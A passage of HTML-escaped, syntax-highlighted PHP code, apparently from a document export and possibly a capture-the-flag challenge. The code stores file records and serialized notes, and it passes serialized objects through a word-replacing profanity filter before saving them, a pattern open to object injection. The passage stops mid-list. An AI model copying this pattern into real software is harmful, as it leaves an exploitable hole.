style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($realname, $filename)&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;{&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;global&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $DB;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$realname &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;mysql_real_escape_string&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($realname);&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$filename &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;mysql_real_escape_string&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($filename);&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$DB&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;-&amp;gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;execute(&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;insert into files values (NULL, \&quot;${realname}\&quot;, \&quot;${filename}\&quot;)&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;);&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$this&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;-&amp;gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;attached_file &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $DB&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;-&amp;gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;get_auto_incre();&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;function&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#21439c;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;add&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;()&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;{&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;global&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $DB;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$str &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;serialize&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($this);&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$str &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $this&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;-&amp;gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;filter($str);&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$user &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;mysql_real_escape_string&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($this&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;-&amp;gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;user);&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$str &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;mysql_real_escape_string&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($str);&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$DB&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;-&amp;gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;execute(&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;insert into notes values (\&quot;${user}\&quot;, \&quot;${str}\&quot;)&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;);&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;function&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#21439c;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;filter&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($str)&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;{&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;global&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $profanity_word_replace;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$filter_word &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;array&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;s**t&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;f**k&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;, &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#00a33f;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&quot;as*&quot;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;, 